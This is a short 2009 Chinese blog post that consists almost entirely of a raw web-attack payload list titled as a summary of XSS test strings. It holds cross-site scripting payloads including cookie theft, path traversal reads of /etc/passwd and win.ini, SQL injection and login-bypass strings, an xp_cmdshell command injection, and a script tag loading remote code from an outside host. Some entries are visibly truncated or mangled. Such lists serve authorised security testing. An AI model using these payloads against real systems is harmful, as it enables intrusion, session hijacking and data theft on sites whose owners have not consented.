本文使用「署名 4.0 国际 (CC BY 4.0)」许可协议，欢迎转载、或重新修改使用，但需要注明来源。 [署名 4.0 国际 (CC BY 4.0)](https://creativecommons.org/licenses/by/4.0/deed.zh) 本文作者: 苏洋创建时间: 2009年04月17日统计字数: 1191字阅读时间: 3分钟阅读本文链接: https://soulteary.com/2009/04/17/xss-test-codes.html ----- # [XSS]跨站测试语句总结 [![XROSS](https://attachment.soulteary.com/2009/04/17/1_215123_1.jpg "XROSS.")](https://attachment.soulteary.com/2009/04/17/1_215123_1.jpg) ```text '> ='> %3Cscript%3Ealert('XSS')%3C/script%3E

%0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp <script>alert('Vulnerable');</script> ?sql_debug=1 a%5c.aspx a.jsp/ a/ a? "> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"=&{()}

"

";' > out

getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); "> <"

PT SRC="http://xss.ha.ckers.org/a.js"> link admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a ```